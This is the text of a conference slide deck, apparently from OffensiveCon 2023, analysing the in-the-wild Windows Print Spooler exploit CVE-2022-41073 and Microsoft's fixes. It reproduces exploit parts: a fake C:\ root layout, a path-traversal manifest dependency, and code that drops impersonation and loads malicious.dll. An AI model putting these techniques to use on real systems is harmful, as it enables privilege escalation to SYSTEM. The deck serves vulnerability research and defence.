[go: up one dir, main page]
Scribd
Upload
27 views79 pages

OffensiveCon2023.PrintSpooler

asdfasdf

Uploaded by

objectivecurie
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
27 views79 pages

OffensiveCon2023.PrintSpooler

asdfasdf

Uploaded by

objectivecurie
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 79

Maddie Stone

James Forshaw
OffensiveCon 2023
CVE-2022-41073

https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2022/CVE-2022-41073.html
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41073
Oct 2022 - winspool.drv!LoadNewCopy
HMODULE LoadNewCopy(LPCWSTR DllPath, DWORD dwFlags) {
ULONG_PTR ulCookie;
ActivateActCtx(ACTCTX_EMPTY, &ulCookie);
HMODULE hModule = LoadLibraryExW(DllPath, NULL, dwFlags);
// ...
}
Nov 2022 - winspool.drv!LoadNewCopy
HMODULE LoadNewCopy(LPCWSTR DllPath, DWORD dwFlags) {
ULONG_PTR ulCookie;
ActivateActCtx(ACTCTX_EMPTY, &ulCookie);
HMODULE hModule;
HANDLE hToken;
+ if (RevertToProcess(&hToken)) {
hModule = LoadLibraryExW(DllPath, NULL, dwFlags);
+ ResumeImpersonation(hToken);
}
// ...
}
https://bugs.chromium.org/p/project-zero/issues/detail?id=240
Impersonating Caller

LoadLibrary(SharedLibrary.dll)

C:\

Windows\System32\SharedLibrary.dll
Impersonating Caller

LoadLibrary(SharedLibrary.dll)

Fake C:\ (MyFakeRoot) C:\

Windows\System32\SharedLibrary.dll Windows\System32\SharedLibrary.dll
https://twitter.com/tiraniddo/status/590931788006084609
C:\MyFakeRoot
├── malicious.dll
├── MyFakeRoot
│ ├── MyFakeRoot.MANIFEST
│ └── prntvpt.dll
├── prntvpt.dll
├── temp.xml
└── Windows
├── System32
│ └── DriverStore
│ └── FileRepository
│ └── prnms003.inf_amd64_454b8d4f31e80f7d
│ └── Amd64
│ └── PrintConfig.dll
└── WinSxS
└── Manifests
├──
amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_792d1c772443f647.manifest
└──
amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1110_none_60b5254171f9507e.manifest
C:\MyFakeRoot
├── malicious.dll
├── MyFakeRoot
│ ├── MyFakeRoot.MANIFEST
│ └── prntvpt.dll
├── prntvpt.dll
├── temp.xml
└── Windows
├── System32
│ └── DriverStore
│ └── FileRepository
│ └── prnms003.inf_amd64_454b8d4f31e80f7d
│ └── Amd64
│ └── PrintConfig.dll
└── WinSxS
└── Manifests
├──
amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_792d1c772443f647.manifest
└──
amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1110_none_60b5254171f9507e.manifest
C:\MyFakeRoot
├── malicious.dll
├── MyFakeRoot
│ ├── MyFakeRoot.MANIFEST
│ └── prntvpt.dll
├── prntvpt.dll
├── temp.xml
└── Windows
├── System32
│ └── DriverStore
│ └── FileRepository
│ └── prnms003.inf_amd64_454b8d4f31e80f7d
│ └── Amd64
│ └── PrintConfig.dll
└── WinSxS
└── Manifests
├──
amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_792d1c772443f647.manifest
└──
amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1110_none_60b5254171f9507e.manifest
C:\MyFakeRoot
├── malicious.dll
├── MyFakeRoot
│ ├── MyFakeRoot.MANIFEST
│ └── prntvpt.dll
├── prntvpt.dll
├── temp.xml
└── Windows
├── System32
│ └── DriverStore
│ └── FileRepository
│ └── prnms003.inf_amd64_454b8d4f31e80f7d
│ └── Amd64
│ └── PrintConfig.dll
└── WinSxS
└── Manifests
├──
amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_792d1c772443f647.manifest
└──
amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1110_none_60b5254171f9507e.manifest
C:\MyFakeRoot
├── malicious.dll
├── MyFakeRoot
│ ├── MyFakeRoot.MANIFEST
│ └── prntvpt.dll
├── prntvpt.dll
├── temp.xml
└── Windows
├── System32
│ └── DriverStore
│ └── FileRepository
│ └── prnms003.inf_amd64_454b8d4f31e80f7d
│ └── Amd64
│ └── PrintConfig.dll
└── WinSxS
└── Manifests
├──
amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_792d1c772443f647.manifest
└──
amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1110_none_60b5254171f9507e.manifest
What's in a MANIFEST?
DLL Hell

Application A

Install shared library.

SharedLibrary.dll
(version 2)

C:\Windows\System32
DLL Hell

Application A Application B

Install shared library.

SharedLibrary.dll
(version 1)

C:\Windows\System32
DLL Hell

Application A Application B

SharedLibrary.dll
(version 1)

C:\Windows\System32
Side by Side Assemblies

Application A Application B

SharedLibrary.dll SharedLibrary.dll
(version 2) (version 1)

C:\Windows\WinSxS
PE Imports

No Version
Information

Version
information but
not detailed
Application Manifest File Identity of the
"Assembly"
<assembly>
<assemblyIdentity name="App.A" version="1.0.0.0"/>
<description>My APP A</description>
<dependency>
<dependentAssembly> Dependencies of this Assembly
<assemblyIdentity
name="SharedLibrary"
version="2.0.0.0" processorArchitecture="*"
publicKeyToken="6595b64144ccf1df" language="*" />
</dependentAssembly>
</dependency>
</assembly>
Using a Manifest

ACTCTX config = {}; Parse manifest file to an activation context


config.cbSize = sizeof(config);
config.lpSource = L"c:\\example.manifest";
HANDLE actctx = CreateActCtx(&config);

ULONG_PTR cookie; Activate and load library


ActivateActCtx(actctx, &cookie);
HMODULE ret = LoadLibrary(L"SharedLibrary.dll");
DeactivateActCtx(0, cookie);
...
Assembly Searching Sequence
CSRSS
SXSSRV

Application A

Application Manifest
<assembly>
...
<dependency>
<dependentAssembly>
<assemblyIdentity
name="SharedLibrary"
version="2.0.0.0" />
</dependentAssembly>
</dependency>
</assembly>
Assembly Searching Sequence
CSRSS
SXSSRV Version 2.0.1234.0

Application A

Application Manifest
<assembly>
...
<dependency>
<dependentAssembly>
<assemblyIdentity
name="SharedLibrary"
version="2.0.0.0" />
</dependentAssembly>
</dependency>
HKLM\SOFTWARE\Microsoft\Windows\
</assembly>
CurrentVersion\SideBySide
Assembly Searching Sequence
CSRSS
SXSSRV

Application A
Assembly Manifest
<assembly>
<assemblyIdentity
Application Manifest name="SharedLibrary"
version="2.0.1234.0"/>
<assembly>
<file name="SharedLibrary.dll"/>
...
...
<dependency>
</assembly>
<dependentAssembly>
<assemblyIdentity
name="SharedLibrary"
version="2.0.0.0" />
</dependentAssembly>
</dependency> C:\Windows\WinSxS\Manifests\
</assembly>
amd64_sharedlibrary_6595b64144ccf1df_2.0.1234.0.manifest
Assembly Searching Sequence
CSRSS
SXSSRV

Application A

Application Manifest
<assembly>
...
<dependency>
<dependentAssembly>
Activation Context
<assemblyIdentity
name="SharedLibrary"
version="2.0.0.0" />
</dependentAssembly>
</dependency>
</assembly>
Assembly Manifest File
<assembly>
<assemblyIdentity name="SharedLibrary" version="2.0.1234.0"/>
<dependency> More dependencies
<dependentAssembly>
<assemblyIdentity
name="SharedLibrary.resources" version="2.0.0.0"/>
</dependentAssembly>
</dependency>
<file name="SharedLibrary.dll"/> Assembly resources
</assembly>
Load DLL From Assembly Directory

Application A C:\Windows\WinSxS\amd64_sharedlibrary_6595b64
144ccf1df_2.0.1234.0
Load
SharedLibrary.dll

LdrLoadDll(...)

Activation Context
SharedLibrary.dll
https://www.microsoft.com/en-us/security/blog/2022/07/27/untangling-knotweed-euro
pean-private-sector-offensive-actor-using-0-day-exploits
Exploiting Activation Context Caching
CSRSS
SXSSRV Key Activation Context Cache

☠Assembly Manifest Assembly Manifest


<assembly> Aliased Key
... <assembly>
<file loadFrom="c:\evil.dll" ...
name="SharedLibrary.dll"/> <file name="SharedLibrary.dll"/>
</assembly> </assembly>

C:\Windows\WinSxS\Manifests\
amd64_sharedlibrary_6595b64144ccf1df_2.0.1234.0.manifest

Malicious Application
Exploiting Activation Context Caching
CSRSS
SXSSRV Key Activation Context Cache

☠Assembly Manifest Assembly Manifest


Application
<assembly>
... <assembly> <assembly>
<file loadFrom="c:\evil.dll" ... ...
name="SharedLibrary.dll"/> <dependency> <file name="SharedLibrary.dll"/>
</assembly> <dependentAssembly> </assembly>
<assemblyIdentity
name="SharedLibrary"
version="2.0.0.0" />
</dependentAssembly>
</dependency>
</assembly>
Exploiting Activation Context Caching
CSRSS
SXSSRV Key Activation Context Cache

☠Assembly Manifest
Application
<assembly>
...

☠Activation
<file loadFrom="c:\evil.dll"
name="SharedLibrary.dll"/>
</assembly>
Context

evil.dll
Weak Caching Key

https://bugs.chromium.org/p/project-zero/issues/detail?id=1749
https://www.zerodayinitiative.com/blog/2023/1/23/activation-context-cache-poisoning-exploiting-csrss-for-privilege-escalation
Parsing the Manifest during DLL Loading
NTSTATUS BasepProbeForDllManifest(HMODULE DllHandle,
PCWSTR FullDllName,
HANDLE *ActCtx) {
NTSTATUS result = LdrResFindResourceDirectory(DllHandle, Check for isolation
RT_MANIFEST, ISOLATIONAWARE_MANIFEST_RESOURCE_ID); aware manifest
if (NT_SUCCESS(result)) {
ACTCTX config;
config.lpSource = FullDllName; Create an activation context
config.lpResourceName = MAKEINTRESOURCE(ISOLATIONAWARE_MANIFEST_RESOURCE_ID);
config.hModule = DllHandle;
*ActCtx = CreateActCtxW(&context);
if (*ActCtx == INVALID_HANDLE_VALUE) {
return NtCurrentTeb()->LastStatusValue;
}
return result;
The Exploit
C:\MyFakeRoot
├── malicious.dll
├── MyFakeRoot
│ ├── MyFakeRoot.MANIFEST
│ └── prntvpt.dll
├── prntvpt.dll
├── temp.xml
└── Windows
├── System32
│ └── DriverStore
│ └── FileRepository
│ └── prnms003.inf_amd64_454b8d4f31e80f7d
│ └── Amd64
│ └── PrintConfig.dll
└── WinSxS
└── Manifests
├──
amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_792d1c772443f647.manifest
└──
amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1110_none_60b5254171f9507e.manifest
Does PrintConfig.dll have an Isolation Aware Manifest?

ISOLATIONAWARE DLL manifest

Manifest has dependencies


Normal User – MEDIUM integrity SYSTEM integrity

exploit.exe

csrss.exe

Fake C:\ (MyFakeRoot)

C:\Windows\WinSxS
Normal User – MEDIUM integrity SYSTEM integrity

printfilterpipelinesvc.exe

exploit.exe Impersonating Caller

LoadLibrary(PrintConfig.dll)

csrss.exe

Fake C:\ (MyFakeRoot)

C:\Windows\WinSxS
Normal User – MEDIUM integrity SYSTEM integrity

printfilterpipelinesvc.exe

exploit.exe Impersonating Caller

LoadLibrary(PrintConfig.dll)

csrss.exe

Fake C:\ (MyFakeRoot) Impersonating Caller

SXSSRV

C:\Windows\WinSxS
Normal User – MEDIUM integrity SYSTEM integrity

printfilterpipelinesvc.exe

exploit.exe Impersonating Caller

LoadLibrary(PrintConfig.dll)

csrss.exe

Fake C:\ (MyFakeRoot) Impersonating Caller

SXSSRV

Windows/WinSxS

C:\Windows\WinSxS
Exploit Adds to Common Controls SxS Manifests

<dependentAssembly>
<assemblyIdentity
name="..\..\..\..\..\..\MyFakeRoot\MyFakeRoot"
version="1.0.0.0"
processorArchitecture="amd64"
language="*"
publicKeyToken="6595b64144ccf1df"
type="win32" />
</dependentAssembly>
Exploit Adds to Common Controls SxS Manifests

<dependentAssembly>
<assemblyIdentity
name="..\..\..\..\..\..\MyFakeRoot\MyFakeRoot"
version="1.0.0.0"
processorArchitecture="amd64"
language="*"
publicKeyToken="6595b64144ccf1df"
type="win32" />
</dependentAssembly>
Normal User – MEDIUM integrity SYSTEM integrity

printfilterpipelinesvc.exe

exploit.exe Impersonating Caller

LoadLibrary(PrintConfig.dll)

csrss.exe

Fake C:\ (MyFakeRoot) Impersonating Caller

SXSSRV

MyFakeRoot\MyFakeRoot.MANIFEST

C:\Windows\WinSxS
MyFakeRoot.MANIFEST

<assembly>
<assemblyIdentity
name="..\..\..\..\..\..\MyFakeRoot\MyFakeRoot"
version="1.0.0.0"
processorArchitecture="amd64"
publicKeyToken="6595b64144ccf1df"
type="win32" />
<file name="prntvpt.dll"/>
</assembly>
MyFakeRoot.MANIFEST

<assembly>
<assemblyIdentity
name="..\..\..\..\..\..\MyFakeRoot\MyFakeRoot"
version="1.0.0.0"
processorArchitecture="amd64" Redirect prntvpt.dll
publicKeyToken="6595b64144ccf1df"
type="win32" />
<file name="prntvpt.dll"/>
</assembly>
Normal User – MEDIUM integrity SYSTEM integrity

printfilterpipelinesvc.exe

Impersonating Caller

LoadLibrary(PrintConfig.dll)
Fake C:\ (MyFakeRoot)
Activation Context

MyFakeRoot\prntvpt.dll

csrss.exe

Impersonating Caller

SXSSRV
Modification to prntvpt.dll

ATL::_dynamic_initializer_for::AtlBaseModule::()

HMODULE AutoMapNamedElementOnVisit(...) {
SetThreadToken(NULL, NULL);
return LoadLibraryExW(L"C:\\MyFakeRoot\\malicious.dll",
NULL, LOAD_WITH_ALTERED_SEARCH_PATH);
}
Modification to prntvpt.dll

ATL::_dynamic_initializer_for::AtlBaseModule::()

HMODULE AutoMapNamedElementOnVisit(...) {
Turns off impersonation
SetThreadToken(NULL, NULL);
return LoadLibraryExW(L"C:\\MyFakeRoot\\malicious.dll",
NULL, LOAD_WITH_ALTERED_SEARCH_PATH);
}
Modification to prntvpt.dll

ATL::_dynamic_initializer_for::AtlBaseModule::()

HMODULE AutoMapNamedElementOnVisit(...) {
SetThreadToken(NULL, NULL);
return LoadLibraryExW(L"C:\\MyFakeRoot\\malicious.dll",
NULL, LOAD_WITH_ALTERED_SEARCH_PATH);
}
Load final payload DLL.
Normal User – MEDIUM integrity SYSTEM integrity

printfilterpipelinesvc.exe

PrintConfig.dll

Fake C:\ (MyFakeRoot)

(fake) prntvpt.dll

MyFakeRoot\malicious.dll

☠ malicious.dll ☠
Nov 2022 - winspool.drv!LoadNewCopy
HMODULE LoadNewCopy(LPCWSTR DllPath, DWORD dwFlags) {
ULONG_PTR ulCookie;
ActivateActCtx(ACTCTX_EMPTY, &ulCookie);
HMODULE hModule;
HANDLE hToken;
+ if (RevertToProcess(&hToken)) {
hModule = LoadLibraryExW(DllPath, NULL, dwFlags);
+ ResumeImpersonation(hToken);
}
// ...
}
Dec 2022 - sxssrv!BasepSxsCreateFileStreamEx

DWORD dwAttr = OBJ_CASE_INSENSITIVE;


+ if (AssemblyManifestRedirectTrust::IsEnabled() &&
+ ((dwFlags & 0x7000) == 0x7000)) {
+ dwAttr |= OBJ_IGNORE_IMPERSONATED_DEVICEMAP;
+ }
OBJECT_ATTRIBUTES ObjectAttributes;
InitializeObjectAttributes(&ObjectAttr, &Path, dwAttr, NULL, NULL);

HANDLE hFile;
NtOpenFile(&hFile, FILE_GENERIC_READ, &ObjectAttributes, ...)
Dec 2022 - sxssrv!BasepSxsCreateFileStreamEx

DWORD dwAttr = OBJ_CASE_INSENSITIVE;


+ if (AssemblyManifestRedirectTrust::IsEnabled() &&
+ ((dwFlags & 0x7000) == 0x7000)) {
+ dwAttr |= OBJ_IGNORE_IMPERSONATED_DEVICEMAP;
+ }
OBJECT_ATTRIBUTES ObjectAttributes;
InitializeObjectAttributes(&ObjectAttr, &Path, dwAttr, NULL, NULL);

HANDLE hFile;
NtOpenFile(&hFile, FILE_GENERIC_READ, &ObjectAttributes, ...)
Dec 2022 - sxssrv!BasepSxsCreateFileStreamEx

DWORD dwAttr = OBJ_CASE_INSENSITIVE;


+ if (AssemblyManifestRedirectTrust::IsEnabled() &&
+ ((dwFlags & 0x7000) == 0x7000)) {
+ dwAttr |= OBJ_IGNORE_IMPERSONATED_DEVICEMAP;
+ } Only true if the process explicitly
OBJECT_ATTRIBUTES ObjectAttributes; enabled the mitigation.
InitializeObjectAttributes(&ObjectAttr, &Path, dwAttr, NULL, NULL);

HANDLE hFile;
NtOpenFile(&hFile, FILE_GENERIC_READ, &ObjectAttributes, ...)
Dec 2022 - sxssrv!BasepSxsCreateFileStreamEx

DWORD dwAttr = OBJ_CASE_INSENSITIVE;


+ if (AssemblyManifestRedirectTrust::IsEnabled() &&
+ ((dwFlags & 0x7000) == 0x7000)) {
+ dwAttr |= OBJ_IGNORE_IMPERSONATED_DEVICEMAP;
+ }
OBJECT_ATTRIBUTES ObjectAttributes;
InitializeObjectAttributes(&ObjectAttr, &Path, dwAttr, NULL, NULL);

HANDLE hFile;
NtOpenFile(&hFile, FILE_GENERIC_READ, &ObjectAttributes, ...)
Dec 2022 - kernel32!BasepCreateActCtx
DWORD dwFlags = 0;
if (AssemblyManifestRedirectTrust::IsEnabled()) {
if (IsSystemProcess())
dwFlags |= 0x1000;
if (NtCurrentTeb()->IsImpersonating)
dwFlags |= 0x2000;
if (((dwFlags & 0x3000) == 0x3000) &&
KernelBaseAssemblyManifestIgnoreImpersonated) {
dwFlags |= 0x4000;
}
}
CsrBasepCreateActCtxCommon(dwFlags, ...);
Dec 2022 - kernel32!BasepCreateActCtx
DWORD dwFlags = 0;
if (AssemblyManifestRedirectTrust::IsEnabled()) {
if (IsSystemProcess()) Checks for "System"
dwFlags |= 0x1000; Integrity Level
if (NtCurrentTeb()->IsImpersonating)
dwFlags |= 0x2000; Is the thread currently
impersonating?
if (((dwFlags & 0x3000) == 0x3000) &&
KernelBaseAssemblyManifestIgnoreImpersonated) {
dwFlags |= 0x4000;
}
}
CsrBasepCreateActCtxCommon(dwFlags, ...);
Dec 2022 - kernel32!BasepCreateActCtx
DWORD dwFlags = 0;
if (AssemblyManifestRedirectTrust::IsEnabled()) {
if (IsSystemProcess())
dwFlags |= 0x1000;
Is mitigation enabled? If
if (NtCurrentTeb()->IsImpersonating)
so final flags is 0x7000.
dwFlags |= 0x2000;
if (((dwFlags & 0x3000) == 0x3000) &&
KernelBaseAssemblyManifestIgnoreImpersonated) {
dwFlags |= 0x4000;
}
}
CsrBasepCreateActCtxCommon(dwFlags, ...);
Dec 2022 - kernelbase!SetProcessMitigationPolicy

// ...

+ if (MitigationPolicy == ProcessUserPointerAuthPolicy &&


+ AssemblyManifestRedirectTrust::IsEnabled()) {
+ BOOLEAN bEnable = *(PDWORD)lpBuffer != 0;
+ KernelBaseAssemblyManifestIgnoreImpersonated = bEnable;
+ }

// ...
Dec 2022 - kernelbase!SetProcessMitigationPolicy
Enumerated value 17, this is the SDK name which is
clearly wrong!
// ...

+ if (MitigationPolicy == ProcessUserPointerAuthPolicy &&


+ AssemblyManifestRedirectTrust::IsEnabled()) {
+ BOOLEAN bEnable = *(PDWORD)lpBuffer != 0;
+ KernelBaseAssemblyManifestIgnoreImpersonated = bEnable;
+ }

// ...
Dec 2022 - kernelbase!SetProcessMitigationPolicy

// ...

+ if (MitigationPolicy == ProcessUserPointerAuthPolicy &&


+ AssemblyManifestRedirectTrust::IsEnabled()) {
+ BOOLEAN bEnable = *(PDWORD)lpBuffer != 0;
+ KernelBaseAssemblyManifestIgnoreImpersonated = bEnable;
+ }

// ... Sets a global


variable.
Jan 2023 - printfilterpipelinesvc!wWinMain

// ...
+ DWORD Policy = TRUE;
+ SetProcessMitigationPolicy(ProcessUserPointerAuthPolicy,
+ &Policy, sizeof(Policy));
// ...
CVE-2022-41073 Root Cause

The user can remap the root drive (C:\) for privileged processes
during impersonation.
A design flaw which has been known about since at least 2015.
Variant Analysis
Normal User – MEDIUM integrity SYSTEM integrity

sv. exe
ol
spo
printfilterpipelinesvc.exe

exploit.exe Impersonating Caller

LoadLibrary(PrintConfig.dll)

csrss.exe

Fake C:\ (MyFakeRoot) Impersonating Caller

SXSSRV

Windows/WinSxS

C:\Windows\WinSxS
May 2022 – localspl.dll

void PrintConfigDataHelper::CreateConfigProviderHandle() {
LPCWSTR lpConfigPath = GetConfigFilePath();
if (lpConfigPath && RevertToPrinterSelf()) {
hModule = LoadLibrary(lpConfigPath);
ImpersonatePrinterClient();
}
// ...
}
May 2022 – spoolsv!EnableMitigations
DWORD Policy = GetSpoolerRedirectionPolicy();
SetProcessMitigationPolicy(ProcessRedirectionTrustPolicy,
&Policy, sizeof(Policy));
// ...

if (MSRC70412_PrintManifestRedirectOptIn::IsEnabled()) {
Policy = TRUE;
SetProcessMitigationPolicy(ProcessUserPointerAuthPolicy,
&Policy, sizeof(Policy));
}
// ...
Find DLL Loads using Process Monitor

Filter Option Match Value Result

User begins with NT AUTHORITY\ Include

Path ends with .dll Include

Operation is CreateFile Include

Detail contains Impersonating: <USER> Include

Detail excludes Execute/Traverse Exclude


Check for the Process Mitigation

Value of 1 indicates mitigation is set.


Check for Isolation Aware Manifest

Needs to be "IsolationAware"

Has at least one dependency.


Debugging SXS Loading
Start SXS trace

C:\> sxstrace Trace -logfile:my_trace.log

Parse SXS trace to a text file


C:\> sxstrace Parse -logfile:my_trace.log -outfile:my_trace.txt

INFO: Resolving reference


..&#x5c;..&#x5c;..&#x5c;..&#x5c;..&#x5c;..&#x5c;MyFakeRoot&#x5c;MyFakeRoot,language="&#x2a;",pr
ocessorArchitecture="amd64",publicKeyToken="6595b64144ccf1df",type="win32",version="1.0.0.0".
INFO: Begin assembly probing.
INFO: Did not find the assembly in WinSxS.
INFO: Attempt to probe manifest at
C:\WINDOWS\assembly\GAC_64\..\..\..\..\..\..\MyFakeRoot\MyFakeRoot\1.0.0.0_en-US_6595b64144ccf
1df\..\..\..\..\..\..\MyFakeRoot\MyFakeRoot.DLL.
DEMO
Final Thoughts
Thank you!

Maddie Stone
James Forshaw

You might also like